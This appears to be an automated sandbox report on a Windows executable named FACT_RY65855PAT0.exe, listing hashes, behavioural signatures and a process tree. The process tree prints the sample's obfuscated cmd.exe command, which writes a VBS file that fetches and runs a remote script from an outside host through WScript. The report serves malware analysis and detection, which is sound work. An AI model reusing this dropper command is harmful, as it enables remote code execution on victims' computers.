Analysis
-
max time kernel
307s -
max time network
297s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-es -
resource tags
arch:x64arch:x86image:win10v2004-20230221-eslocale:es-esos:windows10-2004-x64systemwindows -
submitted
31-03-2023 20:21
Static task
static1
Behavioral task
behavioral1
Sample
FACT_RY65855PAT0.zip
Resource
win7-20230220-es
Behavioral task
behavioral2
Sample
FACT_RY65855PAT0.zip
Resource
win10v2004-20230220-es
Behavioral task
behavioral3
Sample
FACT_RY65855PAT0.exe
Resource
win7-20230220-es
Behavioral task
behavioral4
Sample
FACT_RY65855PAT0.exe
Resource
win10v2004-20230221-es
Behavioral task
behavioral5
Sample
~.exe
Resource
win7-20230220-es
Behavioral task
behavioral6
Sample
~.exe
Resource
win10v2004-20230220-es
General
-
Target
FACT_RY65855PAT0.exe
-
Size
1.8MB
-
MD5
3d6b870b71fe64e9fab41314f4ff75cf
-
SHA1
45e91fc8eb9cace7143d06a39166108b5531607a
-
SHA256
1eeb7c8ef775f5bf2f0e19d3fccc2df475aadb65a039fbdc0593ed48d6ed24ae
-
SHA512
d093533ca4ca8e82029ef47c4135e15c99494e25d9db3ce49d06fb89cce44ee934288e98b15561b95911522a3f1b5e49f23a853b68389e53caebd7c88194c5d9
-
SSDEEP
49152:eGj78kv0nmHkhPk0+mzTcg/S1OJqqA0ieped:ZXrv/Hky0RzPSMJ9AQod
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
WScript.exeflow pid process 41 3816 WScript.exe 43 3816 WScript.exe 46 3816 WScript.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
Processes:
cmd.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000_Classes\Local Settings cmd.exe -
Suspicious use of WriteProcessMemory 12 IoCs
Processes:
FACT_RY65855PAT0.execmd.execmd.execmd.exedescription pid process target process PID 4436 wrote to memory of 1000 4436 FACT_RY65855PAT0.exe cmd.exe PID 4436 wrote to memory of 1000 4436 FACT_RY65855PAT0.exe cmd.exe PID 4436 wrote to memory of 1000 4436 FACT_RY65855PAT0.exe cmd.exe PID 1000 wrote to memory of 1976 1000 cmd.exe cmd.exe PID 1000 wrote to memory of 1976 1000 cmd.exe cmd.exe PID 1000 wrote to memory of 1976 1000 cmd.exe cmd.exe PID 1976 wrote to memory of 1568 1976 cmd.exe cmd.exe PID 1976 wrote to memory of 1568 1976 cmd.exe cmd.exe PID 1976 wrote to memory of 1568 1976 cmd.exe cmd.exe PID 1568 wrote to memory of 3816 1568 cmd.exe WScript.exe PID 1568 wrote to memory of 3816 1568 cmd.exe WScript.exe PID 1568 wrote to memory of 3816 1568 cmd.exe WScript.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\FACT_RY65855PAT0.exe"C:\Users\Admin\AppData\Local\Temp\FACT_RY65855PAT0.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c %ComSpec% /V/D/c "echo mf8=".":hk85=":":gn2="/":GetObject("scripT"+hk85+"https"+hk85+"//mtx"+mf8+"zzux"+mf8+"com/njmr1")>%Public%\h587.vBs&&%ComSpec% /c start %Public%\h587.vBs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /V/D/c "echo mf8=".":hk85=":":gn2="/":GetObject("scripT"+hk85+"https"+hk85+"//mtx"+mf8+"zzux"+mf8+"com/njmr1")>C:\Users\Public\h587.vBs&&C:\Windows\system32\cmd.exe /c start C:\Users\Public\h587.vBs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c start C:\Users\Public\h587.vBs4⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\h587.vBs"5⤵
- Blocklisted process makes network request
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\h587.vBsFilesize
99B
MD50a7ccba24c3dd86e5af2e22e583e974c
SHA12dad8b33c4bbcc73cbd61f94d5f17af392c0ebd8
SHA2569d69d5dd7aea0e2e3f4a18551bc6b1bfa8ab77c528fd1a5a29e3c4baf471c43f
SHA512c7aabaebd16b16cff069d776ca06810aa60e9c950080c2503deaa93a22bb06b491b0cbaafb5b5917abf9b6e430558356612e08537444e34be0f966c0cd1ab249
-
memory/4436-133-0x0000000000510000-0x00000000006E8000-memory.dmpFilesize
1.8MB
-
memory/4436-150-0x0000000000510000-0x00000000006E8000-memory.dmpFilesize
1.8MB
-
memory/4436-151-0x0000000000510000-0x00000000006E8000-memory.dmpFilesize
1.8MB